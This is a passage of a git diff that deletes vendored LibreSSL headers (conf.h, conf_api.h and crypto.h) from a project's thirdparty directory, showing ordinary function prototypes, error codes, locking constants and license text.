-int NCONF_load(CONF *conf, const char *file, long *eline);
-int NCONF_load_fp(CONF *conf, FILE *fp, long *eline);
-int NCONF_load_bio(CONF *conf, BIO *bp, long *eline);
-STACK_OF(CONF_VALUE) *NCONF_get_section(const CONF *conf, const char *section);
-char *NCONF_get_string(const CONF *conf, const char *group, const char *name);
-int NCONF_get_number_e(const CONF *conf, const char *group, const char *name,
-    long *result);
-int NCONF_dump_fp(const CONF *conf, FILE *out);
-int NCONF_dump_bio(const CONF *conf, BIO *out);
-
-#define NCONF_get_number(c,g,n,r) NCONF_get_number_e(c,g,n,r)
-
-/* Module functions */
-
-int CONF_modules_load(const CONF *cnf, const char *appname,
-    unsigned long flags);
-int CONF_modules_load_file(const char *filename, const char *appname,
-    unsigned long flags);
-void CONF_modules_unload(int all);
-void CONF_modules_finish(void);
-void CONF_modules_free(void);
-int CONF_module_add(const char *name, conf_init_func *ifunc,
-    conf_finish_func *ffunc);
-
-const char *CONF_imodule_get_name(const CONF_IMODULE *md);
-const char *CONF_imodule_get_value(const CONF_IMODULE *md);
-void *CONF_imodule_get_usr_data(const CONF_IMODULE *md);
-void CONF_imodule_set_usr_data(CONF_IMODULE *md, void *usr_data);
-CONF_MODULE *CONF_imodule_get_module(const CONF_IMODULE *md);
-unsigned long CONF_imodule_get_flags(const CONF_IMODULE *md);
-void CONF_imodule_set_flags(CONF_IMODULE *md, unsigned long flags);
-void *CONF_module_get_usr_data(CONF_MODULE *pmod);
-void CONF_module_set_usr_data(CONF_MODULE *pmod, void *usr_data);
-
-char *CONF_get1_default_config_file(void);
-
-int CONF_parse_list(const char *list, int sep, int nospc,
-    int (*list_cb)(const char *elem, int len, void *usr), void *arg);
-
-void OPENSSL_load_builtin_modules(void);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_CONF_strings(void);
-
-/* Error codes for the CONF functions. */
-
-/* Function codes. */
-#define CONF_F_CONF_DUMP_FP				 104
-#define CONF_F_CONF_LOAD				 100
-#define CONF_F_CONF_LOAD_BIO				 102
-#define CONF_F_CONF_LOAD_FP				 103
-#define CONF_F_CONF_MODULES_LOAD			 116
-#define CONF_F_CONF_PARSE_LIST				 119
-#define CONF_F_DEF_LOAD					 120
-#define CONF_F_DEF_LOAD_BIO				 121
-#define CONF_F_MODULE_INIT				 115
-#define CONF_F_MODULE_LOAD_DSO				 117
-#define CONF_F_MODULE_RUN				 118
-#define CONF_F_NCONF_DUMP_BIO				 105
-#define CONF_F_NCONF_DUMP_FP				 106
-#define CONF_F_NCONF_GET_NUMBER				 107
-#define CONF_F_NCONF_GET_NUMBER_E			 112
-#define CONF_F_NCONF_GET_SECTION			 108
-#define CONF_F_NCONF_GET_STRING				 109
-#define CONF_F_NCONF_LOAD				 113
-#define CONF_F_NCONF_LOAD_BIO				 110
-#define CONF_F_NCONF_LOAD_FP				 114
-#define CONF_F_NCONF_NEW				 111
-#define CONF_F_STR_COPY					 101
-
-/* Reason codes. */
-#define CONF_R_ERROR_LOADING_DSO			 110
-#define CONF_R_LIST_CANNOT_BE_NULL			 115
-#define CONF_R_MISSING_CLOSE_SQUARE_BRACKET		 100
-#define CONF_R_MISSING_EQUAL_SIGN			 101
-#define CONF_R_MISSING_FINISH_FUNCTION			 111
-#define CONF_R_MISSING_INIT_FUNCTION			 112
-#define CONF_R_MODULE_INITIALIZATION_ERROR		 109
-#define CONF_R_NO_CLOSE_BRACE				 102
-#define CONF_R_NO_CONF					 105
-#define CONF_R_NO_CONF_OR_ENVIRONMENT_VARIABLE		 106
-#define CONF_R_NO_SECTION				 107
-#define CONF_R_NO_SUCH_FILE				 114
-#define CONF_R_NO_VALUE					 108
-#define CONF_R_UNABLE_TO_CREATE_NEW_SECTION		 103
-#define CONF_R_UNKNOWN_MODULE_NAME			 113
-#define CONF_R_VARIABLE_HAS_NO_VALUE			 104
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/conf_api.h b/thirdparty/libressl/include/openssl/conf_api.h
deleted file mode 100644
index 95f9386..0000000
--- a/thirdparty/libressl/include/openssl/conf_api.h
+++ /dev/null
@@ -1,88 +0,0 @@
-/* $OpenBSD: conf_api.h,v 1.4 2014/06/12 15:49:28 deraadt Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef  HEADER_CONF_API_H
-#define HEADER_CONF_API_H
-
-#include <openssl/lhash.h>
-#include <openssl/conf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Up until OpenSSL 0.9.5a, this was new_section */
-CONF_VALUE *_CONF_new_section(CONF *conf, const char *section);
-/* Up until OpenSSL 0.9.5a, this was get_section */
-CONF_VALUE *_CONF_get_section(const CONF *conf, const char *section);
-/* Up until OpenSSL 0.9.5a, this was CONF_get_section */
-STACK_OF(CONF_VALUE) *_CONF_get_section_values(const CONF *conf,
-    const char *section);
-
-int _CONF_add_string(CONF *conf, CONF_VALUE *section, CONF_VALUE *value);
-char *_CONF_get_string(const CONF *conf, const char *section,
-    const char *name);
-long _CONF_get_number(const CONF *conf, const char *section, const char *name);
-
-int _CONF_new_data(CONF *conf);
-void _CONF_free_data(CONF *conf);
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/crypto.h b/thirdparty/libressl/include/openssl/crypto.h
deleted file mode 100644
index 068415f..0000000
--- a/thirdparty/libressl/include/openssl/crypto.h
+++ /dev/null
@@ -1,540 +0,0 @@
-/* $OpenBSD: crypto.h,v 1.41 2017/04/29 21:48:43 jsing Exp $ */
-/* ====================================================================
- * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- * ECDH support in OpenSSL originally developed by
- * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
- */
-
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-
-#ifndef HEADER_CRYPTO_H
-#define HEADER_CRYPTO_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/stack.h>
-#include <openssl/safestack.h>
-#include <openssl/opensslv.h>
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Backward compatibility to SSLeay */
-/* This is more to be used to check the correct DLL is being used
- * in the MS world. */
-#define SSLEAY_VERSION_NUMBER	OPENSSL_VERSION_NUMBER
-#define SSLEAY_VERSION		0
-/* #define SSLEAY_OPTIONS	1 no longer supported */
-#define SSLEAY_CFLAGS		2
-#define SSLEAY_BUILT_ON		3
-#define SSLEAY_PLATFORM		4
-#define SSLEAY_DIR		5
-
-/* A generic structure to pass assorted data in a expandable way */
-typedef struct openssl_item_st {
-	int code;
-	void *value;		/* Not used for flag attributes */
-	size_t value_size;	/* Max size of value for output, length for input */
-	size_t *value_length;	/* Returned length of value for output */
-} OPENSSL_ITEM;
-
-
-/* When changing the CRYPTO_LOCK_* list, be sure to maintain the text lock
- * names in cryptlib.c
- */
-
-#define	CRYPTO_LOCK_ERR			1
-#define	CRYPTO_LOCK_EX_DATA		2
-#define	CRYPTO_LOCK_X509		3
-#define	CRYPTO_LOCK_X509_INFO		4
-#define	CRYPTO_LOCK_X509_PKEY		5
-#define CRYPTO_LOCK_X509_CRL		6
-#define CRYPTO_LOCK_X509_REQ		7
-#define CRYPTO_LOCK_DSA			8
-#define CRYPTO_LOCK_RSA			9
-#define CRYPTO_LOCK_EVP_PKEY		10
-#define CRYPTO_LOCK_X509_STORE		11
-#define CRYPTO_LOCK_SSL_CTX		12
-#define CRYPTO_LOCK_SSL_CERT		13
-#define CRYPTO_LOCK_SSL_SESSION		14
-#define CRYPTO_LOCK_SSL_SESS_CERT	15
-#define CRYPTO_LOCK_SSL			16
-#define CRYPTO_LOCK_SSL_METHOD		17
-#define CRYPTO_LOCK_RAND		18
-#define CRYPTO_LOCK_RAND2		19
-#define CRYPTO_LOCK_MALLOC		20
-#define CRYPTO_LOCK_BIO			21
-#define CRYPTO_LOCK_GETHOSTBYNAME	22
-#define CRYPTO_LOCK_GETSERVBYNAME	23
-#define CRYPTO_LOCK_READDIR		24
-#define CRYPTO_LOCK_RSA_BLINDING	25
-#define CRYPTO_LOCK_DH			26
-#define CRYPTO_LOCK_MALLOC2		27
-#define CRYPTO_LOCK_DSO			28
-#define CRYPTO_LOCK_DYNLOCK		29
-#define CRYPTO_LOCK_ENGINE		30
-#define CRYPTO_LOCK_UI			31
-#define CRYPTO_LOCK_ECDSA               32
-#define CRYPTO_LOCK_EC			33
-#define CRYPTO_LOCK_ECDH		34
-#define CRYPTO_LOCK_BN  		35
-#define CRYPTO_LOCK_EC_PRE_COMP		36
-#define CRYPTO_LOCK_STORE		37
-#define CRYPTO_LOCK_COMP		38
-#define CRYPTO_LOCK_FIPS		39
-#define CRYPTO_LOCK_FIPS2		40
-#define CRYPTO_NUM_LOCKS		41
-
-#define CRYPTO_LOCK		1
-#define CRYPTO_UNLOCK		2
-#define CRYPTO_READ		4
-#define CRYPTO_WRITE		8
-
-#ifndef OPENSSL_NO_LOCKING
-#ifndef CRYPTO_w_lock
-#define CRYPTO_w_lock(type)	\
-	CRYPTO_lock(CRYPTO_LOCK|CRYPTO_WRITE,type,__FILE__,__LINE__)
-#define CRYPTO_w_unlock(type)	\
-	CRYPTO_lock(CRYPTO_UNLOCK|CRYPTO_WRITE,type,__FILE__,__LINE__)
-#define CRYPTO_r_lock(type)	\
-	CRYPTO_lock(CRYPTO_LOCK|CRYPTO_READ,type,__FILE__,__LINE__)
-#define CRYPTO_r_unlock(type)	\
-	CRYPTO_lock(CRYPTO_UNLOCK|CRYPTO_READ,type,__FILE__,__LINE__)
-#define CRYPTO_add(addr,amount,type)	\
-	CRYPTO_add_lock(addr,amount,type,__FILE__,__LINE__)
-#endif
-#else
-#define CRYPTO_w_lock(a)
-#define CRYPTO_w_unlock(a)
-#define CRYPTO_r_lock(a)
-#define CRYPTO_r_unlock(a)
-#define CRYPTO_add(a,b,c)	((*(a))+=(b))
-#endif
-
-/* Some applications as well as some parts of OpenSSL need to allocate
-   and deallocate locks in a dynamic fashion.  The following typedef
-   makes this possible in a type-safe manner.  */
-/* struct CRYPTO_dynlock_value has to be defined by the application. */
-typedef struct {
-	int references;
-	struct CRYPTO_dynlock_value *data;
-} CRYPTO_dynlock;
-
-
-/* The following can be used to detect memory leaks in the SSLeay library.
- * It used, it turns on malloc checking */
-
-#define CRYPTO_MEM_CHECK_OFF	0x0	/* an enume */
-#define CRYPTO_MEM_CHECK_ON	0x1	/* a bit */
-#define CRYPTO_MEM_CHECK_ENABLE	0x2	/* a bit */
-#define CRYPTO_MEM_CHECK_DISABLE 0x3	/* an enume */
-
-/* The following are bit values to turn on or off options connected to the
- * malloc checking functionality */
-
-/* Adds time to the memory checking information */
-#define V_CRYPTO_MDEBUG_TIME	0x1 /* a bit */
-/* Adds thread number to the memory checking information */
-#define V_CRYPTO_MDEBUG_THREAD	0x2 /* a bit */
-
-#define V_CRYPTO_MDEBUG_ALL (V_CRYPTO_MDEBUG_TIME | V_CRYPTO_MDEBUG_THREAD)
-
-
-/* predec of the BIO type */
-typedef struct bio_st BIO_dummy;
-
-struct crypto_ex_data_st {
-	STACK_OF(void) *sk;
-};
-DECLARE_STACK_OF(void)
-
-/* This stuff is basically class callback functions
- * The current classes are SSL_CTX, SSL, SSL_SESSION, and a few more */
-
-typedef struct crypto_ex_data_func_st {
-	long argl;	/* Arbitary long */
-	void *argp;	/* Arbitary void * */
-	CRYPTO_EX_new *new_func;
-	CRYPTO_EX_free *free_func;
-	CRYPTO_EX_dup *dup_func;
-} CRYPTO_EX_DATA_FUNCS;
-
-DECLARE_STACK_OF(CRYPTO_EX_DATA_FUNCS)
-
-/* Per class, we have a STACK of CRYPTO_EX_DATA_FUNCS for each CRYPTO_EX_DATA
- * entry.
- */
-
-#define CRYPTO_EX_INDEX_BIO		0
-#define CRYPTO_EX_INDEX_SSL		1
-#define CRYPTO_EX_INDEX_SSL_CTX		2
-#define CRYPTO_EX_INDEX_SSL_SESSION	3
-#define CRYPTO_EX_INDEX_X509_STORE	4
-#define CRYPTO_EX_INDEX_X509_STORE_CTX	5
-#define CRYPTO_EX_INDEX_RSA		6
-#define CRYPTO_EX_INDEX_DSA		7
-#define CRYPTO_EX_INDEX_DH		8
-#define CRYPTO_EX_INDEX_ENGINE		9
-#define CRYPTO_EX_INDEX_X509		10
-#define CRYPTO_EX_INDEX_UI		11
-#define CRYPTO_EX_INDEX_ECDSA		12
-#define CRYPTO_EX_INDEX_ECDH		13
-#define CRYPTO_EX_INDEX_COMP		14
-#define CRYPTO_EX_INDEX_STORE		15
-
-/* Dynamically assigned indexes start from this value (don't use directly, use
- * via CRYPTO_ex_data_new_class). */
-#define CRYPTO_EX_INDEX_USER		100
-
-#define CRYPTO_malloc_init()		(0)
-#define CRYPTO_malloc_debug_init()	(0)
-
-#if defined CRYPTO_MDEBUG_ALL || defined CRYPTO_MDEBUG_TIME || defined CRYPTO_MDEBUG_THREAD
-# ifndef CRYPTO_MDEBUG /* avoid duplicate #define */
-#  define CRYPTO_MDEBUG
-# endif
-#endif
-
-int CRYPTO_mem_ctrl(int mode);
-int CRYPTO_is_mem_check_on(void);
-
-/* for applications */
-#define MemCheck_start() CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON)
-#define MemCheck_stop()	CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_OFF)
-
-#define OPENSSL_malloc(num)	CRYPTO_malloc((int)num,__FILE__,__LINE__)
-#define OPENSSL_strdup(str)	CRYPTO_strdup((str),__FILE__,__LINE__)
-#define OPENSSL_realloc(addr,num) \
-	CRYPTO_realloc((char *)addr,(int)num,__FILE__,__LINE__)
-#define OPENSSL_realloc_clean(addr,old_num,num) \
-	CRYPTO_realloc_clean(addr,old_num,num,__FILE__,__LINE__)
-#define OPENSSL_remalloc(addr,num) \
-	CRYPTO_remalloc((char **)addr,(int)num,__FILE__,__LINE__)
-#define OPENSSL_freeFunc	CRYPTO_free
-#define OPENSSL_free(addr)	CRYPTO_free(addr)
-
-#define OPENSSL_malloc_locked(num) \
-	CRYPTO_malloc_locked((int)num,__FILE__,__LINE__)
-#define OPENSSL_free_locked(addr) CRYPTO_free_locked(addr)
-
-
-const char *SSLeay_version(int type);
-unsigned long SSLeay(void);
-
-/* An opaque type representing an implementation of "ex_data" support */
-typedef struct st_CRYPTO_EX_DATA_IMPL	CRYPTO_EX_DATA_IMPL;
-/* Return an opaque pointer to the current "ex_data" implementation */
-const CRYPTO_EX_DATA_IMPL *CRYPTO_get_ex_data_implementation(void);
-/* Sets the "ex_data" implementation to be used (if it's not too late) */
-int CRYPTO_set_ex_data_implementation(const CRYPTO_EX_DATA_IMPL *i);
-/* Get a new "ex_data" class, and return the corresponding "class_index" */
-int CRYPTO_ex_data_new_class(void);
-/* Within a given class, get/register a new index */
-int CRYPTO_get_ex_new_index(int class_index, long argl, void *argp,
-    CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func,
-    CRYPTO_EX_free *free_func);
-/* Initialise/duplicate/free CRYPTO_EX_DATA variables corresponding to a given
- * class (invokes whatever per-class callbacks are applicable) */
-int CRYPTO_new_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad);
-int CRYPTO_dup_ex_data(int class_index, CRYPTO_EX_DATA *to,
-    CRYPTO_EX_DATA *from);
-void CRYPTO_free_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad);
-/* Get/set data in a CRYPTO_EX_DATA variable corresponding to a particular index
- * (relative to the class type involved) */
-int CRYPTO_set_ex_data(CRYPTO_EX_DATA *ad, int idx, void *val);
-void *CRYPTO_get_ex_data(const CRYPTO_EX_DATA *ad, int idx);
-/* This function cleans up all "ex_data" state. It mustn't be called under
- * potential race-conditions. */
-void CRYPTO_cleanup_all_ex_data(void);
-
-int CRYPTO_get_new_lockid(char *name);
-
-int CRYPTO_num_locks(void); /* return CRYPTO_NUM_LOCKS (shared libs!) */
-void CRYPTO_lock(int mode, int type, const char *file, int line);
-void CRYPTO_set_locking_callback(void (*func)(int mode, int type,
-    const char *file, int line));
-void (*CRYPTO_get_locking_callback(void))(int mode, int type,
-    const char *file, int line);
-void CRYPTO_set_add_lock_callback(int (*func)(int *num, int mount, int type,
-    const char *file, int line));
-int (*CRYPTO_get_add_lock_callback(void))(int *num, int mount, int type,
-    const char *file, int line);
-
-/* Don't use this structure directly. */
-typedef struct crypto_threadid_st {
-	void *ptr;
-	unsigned long val;
-} CRYPTO_THREADID;
-/* Only use CRYPTO_THREADID_set_[numeric|pointer]() within callbacks */
-void CRYPTO_THREADID_set_numeric(CRYPTO_THREADID *id, unsigned long val);
-void CRYPTO_THREADID_set_pointer(CRYPTO_THREADID *id, void *ptr);
-int CRYPTO_THREADID_set_callback(void (*threadid_func)(CRYPTO_THREADID *));
-void (*CRYPTO_THREADID_get_callback(void))(CRYPTO_THREADID *);
-void CRYPTO_THREADID_current(CRYPTO_THREADID *id);
-int CRYPTO_THREADID_cmp(const CRYPTO_THREADID *a, const CRYPTO_THREADID *b);
-void CRYPTO_THREADID_cpy(CRYPTO_THREADID *dest, const CRYPTO_THREADID *src);
-unsigned long CRYPTO_THREADID_hash(const CRYPTO_THREADID *id);
-#ifndef OPENSSL_NO_DEPRECATED
-void CRYPTO_set_id_callback(unsigned long (*func)(void));
-unsigned long (*CRYPTO_get_id_callback(void))(void);
-unsigned long CRYPTO_thread_id(void);
-#endif
-
-const char *CRYPTO_get_lock_name(int type);
-int CRYPTO_add_lock(int *pointer, int amount, int type, const char *file,
-    int line);
-
-int CRYPTO_get_new_dynlockid(void);
-void CRYPTO_destroy_dynlockid(int i);
-struct CRYPTO_dynlock_value *CRYPTO_get_dynlock_value(int i);
-void CRYPTO_set_dynlock_create_callback(struct CRYPTO_dynlock_value *(*dyn_create_function)(const char *file, int line));
-void CRYPTO_set_dynlock_lock_callback(void (*dyn_lock_function)(int mode, struct CRYPTO_dynlock_value *l, const char *file, int line));
-void CRYPTO_set_dynlock_destroy_callback(void (*dyn_destroy_function)(struct CRYPTO_dynlock_value *l, const char *file, int line));
-struct CRYPTO_dynlock_value *(*CRYPTO_get_dynlock_create_callback(void))(const char *file, int line);
-void (*CRYPTO_get_dynlock_lock_callback(void))(int mode, struct CRYPTO_dynlock_value *l, const char *file, int line);
-void (*CRYPTO_get_dynlock_destroy_callback(void))(struct CRYPTO_dynlock_value *l, const char *file, int line);
-
-/* CRYPTO_set_mem_functions includes CRYPTO_set_locked_mem_functions --
- * call the latter last if you need different functions */
-int CRYPTO_set_mem_functions(void *(*m)(size_t), void *(*r)(void *, size_t), void (*f)(void *));
-int CRYPTO_set_locked_mem_functions(void *(*m)(size_t), void (*free_func)(void *));
-int CRYPTO_set_mem_ex_functions(void *(*m)(size_t, const char *, int),
-    void *(*r)(void *, size_t, const char *, int), void (*f)(void *));
-int CRYPTO_set_locked_mem_ex_functions(void *(*m)(size_t, const char *, int),
-    void (*free_func)(void *));
-int CRYPTO_set_mem_debug_functions(
-    void (*m)(void *, int, const char *, int, int),
-    void (*r)(void *, void *, int, const char *, int, int),
-    void (*f)(void *, int), void (*so)(long), long (*go)(void));
-void CRYPTO_get_mem_functions(void *(**m)(size_t), void *(**r)(void *, size_t),
-    void (**f)(void *));
-void CRYPTO_get_locked_mem_functions(void *(**m)(size_t), void (**f)(void *));
-void CRYPTO_get_mem_ex_functions(void *(**m)(size_t, const char *, int),
-    void *(**r)(void *, size_t, const char *, int), void (**f)(void *));
-void CRYPTO_get_locked_mem_ex_functions(void *(**m)(size_t, const char *, int),
-    void (**f)(void *));
-void CRYPTO_get_mem_debug_functions(
-    void (**m)(void *, int, const char *, int, int),
-    void (**r)(void *, void *, int, const char *, int, int),
-    void (**f)(void *, int), void (**so)(long), long (**go)(void));
-
-#ifndef LIBRESSL_INTERNAL
-void *CRYPTO_malloc_locked(int num, const char *file, int line);
-void CRYPTO_free_locked(void *ptr);
-void *CRYPTO_malloc(int num, const char *file, int line);
-char *CRYPTO_strdup(const char *str, const char *file, int line);
-void CRYPTO_free(void *ptr);
-void *CRYPTO_realloc(void *addr, int num, const char *file, int line);
-#endif
-
-void *CRYPTO_realloc_clean(void *addr, int old_num, int num,
-    const char *file, int line);
-void *CRYPTO_remalloc(void *addr, int num, const char *file, int line);
-
-#ifndef LIBRESSL_INTERNAL
-void OPENSSL_cleanse(void *ptr, size_t len);
-#endif
-
-void CRYPTO_set_mem_debug_options(long bits);
-long CRYPTO_get_mem_debug_options(void);
-
-#define CRYPTO_push_info(info) \
-        CRYPTO_push_info_(info, __FILE__, __LINE__);
-int CRYPTO_push_info_(const char *info, const char *file, int line);
-int CRYPTO_pop_info(void);
-int CRYPTO_remove_all_info(void);
-
-
-/* Default debugging functions (enabled by CRYPTO_malloc_debug_init() macro;
- * used as default in CRYPTO_MDEBUG compilations): */
-/* The last argument has the following significance:
- *
- * 0:	called before the actual memory allocation has taken place
- * 1:	called after the actual memory allocation has taken place
- */
-void CRYPTO_dbg_malloc(void *addr, int num, const char *file, int line, int before_p)
-	__attribute__ ((deprecated));
-void CRYPTO_dbg_realloc(void *addr1, void *addr2, int num, const char *file, int line, int before_p)
-	__attribute__ ((deprecated));
-void CRYPTO_dbg_free(void *addr, int before_p)
-	__attribute__ ((deprecated));
-/* Tell the debugging code about options.  By default, the following values
- * apply:
- *
- * 0:                           Clear all options.
- * V_CRYPTO_MDEBUG_TIME (1):    Set the "Show Time" option.
- * V_CRYPTO_MDEBUG_THREAD (2):  Set the "Show Thread Number" option.
- * V_CRYPTO_MDEBUG_ALL (3):     1 + 2
- */
-void CRYPTO_dbg_set_options(long bits)
-	__attribute__ ((deprecated));
-long CRYPTO_dbg_get_options(void)
-	__attribute__ ((deprecated));
-
-
-void CRYPTO_mem_leaks_fp(FILE *);
-void CRYPTO_mem_leaks(struct bio_st *bio);
